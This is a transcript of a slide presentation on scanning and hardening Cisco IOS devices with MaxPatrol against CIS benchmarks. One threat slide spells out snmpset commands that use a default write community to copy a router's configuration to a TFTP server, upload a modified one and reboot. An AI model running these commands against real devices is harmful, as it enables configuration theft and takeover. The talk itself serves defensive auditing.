Download
1 / 34

Сканирование Cisco IOS в MaxPatrol - PowerPoint PPT Presentation


  • 130 Views
  • Uploaded on

Сканирование Cisco IOS в MaxPatrol. Сафронов Илья. What’s the deal?. Безопасность сетевых устройств ( Cisco IOS ) Стандарты безопасности Контроль за соответствием стандартам безопасности. Cisco security hardening. Комплексный подход к безопасности устройств Cisco.

loader
I am the owner, or an agent authorized to act on behalf of the owner, of the copyrighted work described.
capcha
Download Presentation

PowerPoint Slideshow about 'Сканирование Cisco IOS в MaxPatrol' - roary-schultz


An Image/Link below is provided (as is) to download presentation

Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author.While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server.


- - - - - - - - - - - - - - - - - - - - - - - - - - E N D - - - - - - - - - - - - - - - - - - - - - - - - - -
Presentation Transcript
Cisco ios maxpatrol

Сканирование Cisco IOS в MaxPatrol

Сафронов Илья


What s the deal
What’s the deal?

  • Безопасность сетевых устройств (Cisco IOS)

  • Стандарты безопасности

  • Контроль за соответствием стандартам безопасности


Cisco security hardening
Cisco security hardening

  • Комплексный подход к безопасности устройств Cisco.

    • Management Plane (управляющий IOS’ом трафик (SSH, SNMP))

    • Control Plane (трафик управления сетью(BGP, STP))

    • Data Plane ( проходящие сквозь устройство данные)


Security benchmarking
Security benchmarking

-CIS

Рекомендации и стандарты по безопасности оборудования и ПО.


Cis cisco ios
CIS – Cisco IOS

  • Бенчмаркпо безопасности для Cisco IOS


Cis cisco ios1
CIS – Cisco IOS

Группы проверок:

  • AAA

  • SNMP

  • Global services (CDP, DHCP, HTTP)

  • Logging

  • Neighbor authentication (EIGRP, OSPF, RIP)






Snmpwalk enumeration
Угроза – Snmpwalk enumeration


Угроза - Копирование файла конфигурации через SNMP

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <адрес TFTP-сервера>.

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1

///Возврат модифицированного файла конфигурации (startup-config)

//обратно на устройство

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <адрес TFTP-сервера>.

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-config

snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1

//Перезагрузка устройства для применения изменений

TFTP-сервер





Login enumeration
Угроза – login enumeration









Enumeration cdp
Угроза - Enumeration через CDP






Решение? маршрутизации


Кастомный маршрутизации стандарт

  • Не нравится / не подходит стандарт?

  • Собери свой!


Заключение маршрутизации

  • Защищайте свои сетевые устройства

  • Следите за стандартами безопасности

  • Регулярно проводите аудит сети


Сафронов Илья маршрутизации

[email protected]


ad